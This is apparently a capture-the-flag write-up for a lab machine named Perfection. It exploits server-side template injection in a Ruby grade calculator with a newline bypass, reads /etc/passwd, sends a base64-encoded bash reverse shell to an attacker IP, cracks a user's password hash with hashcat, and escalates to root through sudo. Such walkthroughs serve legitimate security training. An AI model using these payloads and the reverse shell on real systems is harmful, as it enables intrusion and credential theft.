Perfection - HackMD

# Perfection * Nmap scan * ![image](https://hackmd.io/_uploads/ryxH-LXmT6.png) * Website * ![image](https://hackmd.io/_uploads/rkO58mm6p.png) * There is a weighted grade calculator,I use `burp` capture the packet * ![image](https://hackmd.io/_uploads/HyvjdkNTT.png) * ![image](https://hackmd.io/_uploads/B1Ma_kEaa.png) * I think is a `commands injection` & `SSTI`,after I saw this,I try search on chatGPT * ![image](https://hackmd.io/_uploads/ryzCYkVap.png) * ![image](https://hackmd.io/_uploads/SJ8g9J4Tp.png) * then I got `<%=....%>`, it can put any `ruby` code inside * And I try many commands injection bypass symbol in [here](https://0xffsec.com/handbook/web-applications/command-injection/) ,`%0A` is work * ![image](https://hackmd.io/_uploads/ByyhqkEpT.png) * ![image](https://hackmd.io/_uploads/HJ0ej14ap.png) ```ruby= category=a%0A<%25=File.read("/etc/passwd")%25> ``` * So try put the reverse shell in, and get connect ```bash= #!/bin/bash bash -c "bash -i >& /dev/tcp/10.10.16.12/1337 0>&1" ``` * base64 encode ```bash= IyEvYmluL2Jhc2gKYmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTIvMTMzNyAwPiYxIg== ``` * Generate payload ```bash= category1=a%0A<%25%3dsystem("echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjEyLzEzMzcgMD4mMQ== | base64 -d | bash")%25> nc -lnvp 1337 ``` * ![image](https://hackmd.io/_uploads/HJCtlxNaT.png) * Upgrade shell ```bash= script /dev/null -c /bin/bash CTRL + Z stty raw -echo; fg Then press Enter twice, and then enter: export TERM=xterm ``` * userflag:||`e5176c9da0a1fdb6b89a7e9eca9768a9`|| * ![image](https://hackmd.io/_uploads/r1skGxEpT.png) ## Privilege Escalation * I found a password hash in /susan/Migration/pupilpath_credentials.db * pupilpath_credentials.db ```bash= strings pupilpath_credentials.db ``` * Susan's password hash:`Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f` * I see something in susan's mail * ![image](https://hackmd.io/_uploads/rJARYgE6a.png) * So I use hashcat crack the hash * ![image](https://hackmd.io/_uploads/H1maNz4p6.png) * susan's password:`susan_nasus_413759210` ```bash= hashcat -m 1400 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d ``` * ssh * ![image](https://hackmd.io/_uploads/ryT1HfVap.png) ```bash= sudo su cat /root/root.txt ``` * ![image](https://hackmd.io/_uploads/Byu_HzVpa.png) * rootflag:||`cf491e4abb1c963fadc3a429d9823a5d`||